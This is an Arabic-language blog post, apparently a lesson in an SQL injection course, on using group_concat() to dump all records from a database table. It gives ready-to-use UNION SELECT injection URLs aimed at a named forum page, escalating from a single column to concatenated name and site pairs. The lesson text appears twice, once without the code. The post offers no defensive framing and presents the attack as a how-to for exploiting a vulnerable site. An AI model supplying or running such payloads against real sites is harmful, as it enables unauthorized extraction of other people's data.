SQL INJECTION , دورة SQL injection , دروة الحقن, دورة حقن sql injection , شرح استغلال ثغرات sql injection , شرح دورة الحقن , شرح sql injection , شرح group_concat ، شرح استغلال group_concat
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
درس اليوم يتكلم عن group_concat()
طيب بعطي مثال وان شاء الله تفهموا
لنفرض انه عندنا موقع ومركب عليه قاعدة بيانات اسمها ASDELY.NET وداخلها يوجد جدول اسمه Aljyyosh.com
وداخله عمودان
الاول اسمه Site
والثاني اسمه Name
ويوجد داخله 3 سجلات ، كما في الصورة التاليه
ولنفرض انه عندنا ثغرة sql injection على الموقع والعامود الرابع مصاب
لنفرض انه هذا الموقع
http://www.aljyyosh.com/vb/forumdisplay.php?f=76
طيب نطبق الثغره عليه ونستخرج السجلات منه ، يصير الرابط هيك
بعد تنفيذ هذا الامر رح تطلع لنا النتيجه فقط ASDELY-ScOrPiOn
بس احنا نريد ان نستخرج جميل السجلات وليس سجل واحد! ، او نحن نريد ان نستخرج جميل السجيلات من العامودين Name و Site
رح يكون الامر كالتالي
في هذا الامر رح يستخرج لنا جميع السجلات ، بمعنى انه رح يطلع لنا
ASDELY-ScOrPiOn;Black.jaguar;ASDELY-ScOrPiOn
او ننفذ الامر التالي حتى يستخرج لنا جميع السجلات وكل اسم وجنبه موقعه
بإختصار هذه الدالة كحلقة تكرار ،...، بمعنى اسهل انو هذه الدالة تستخرجلك كل السجلات مع بعض او استخراج جميل السجيلات من اكثر من عامود!
انتهى الشرح
، وأي شيء غير مفهوم انا موجود وما بقصر
بالتوفيق للجميع.
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
درس اليوم يتكلم عن group_concat()
كود:
group_concat()
لنفرض انه عندنا موقع ومركب عليه قاعدة بيانات اسمها ASDELY.NET وداخلها يوجد جدول اسمه Aljyyosh.com
وداخله عمودان
الاول اسمه Site
والثاني اسمه Name
ويوجد داخله 3 سجلات ، كما في الصورة التاليه
ولنفرض انه عندنا ثغرة sql injection على الموقع والعامود الرابع مصاب
لنفرض انه هذا الموقع
http://www.aljyyosh.com/vb/forumdisplay.php?f=76
طيب نطبق الثغره عليه ونستخرج السجلات منه ، يصير الرابط هيك
كود:
http://www.aljyyosh.com/vb/forumdisplay.php?f=76+union+select+1,2,3,Name,5,6,7,8,9,10+from+Aljyyosh.com--
بس احنا نريد ان نستخرج جميل السجلات وليس سجل واحد! ، او نحن نريد ان نستخرج جميل السجيلات من العامودين Name و Site
رح يكون الامر كالتالي
كود:
http://www.aljyyosh.com/vb/forumdisplay.php?f=76+union+select+1,2,3,group_concat(Name),5,6,7,8,9,10+from+Aljyyosh.com--
ASDELY-ScOrPiOn;Black.jaguar;ASDELY-ScOrPiOn
او ننفذ الامر التالي حتى يستخرج لنا جميع السجلات وكل اسم وجنبه موقعه
كود:
http://www.aljyyosh.com/vb/forumdisplay.php?f=76+union+select+1,2,3,group_concat(Name,0x3e,Site),5,6,7,8,9,10+from+Aljyyosh.com--
بإختصار هذه الدالة كحلقة تكرار ،...، بمعنى اسهل انو هذه الدالة تستخرجلك كل السجلات مع بعض او استخراج جميل السجيلات من اكثر من عامود!
انتهى الشرح
، وأي شيء غير مفهوم انا موجود وما بقصر بالتوفيق للجميع.
ليبيا تكنو
ليبيا تكنو
0 التعليقات:
إرسال تعليق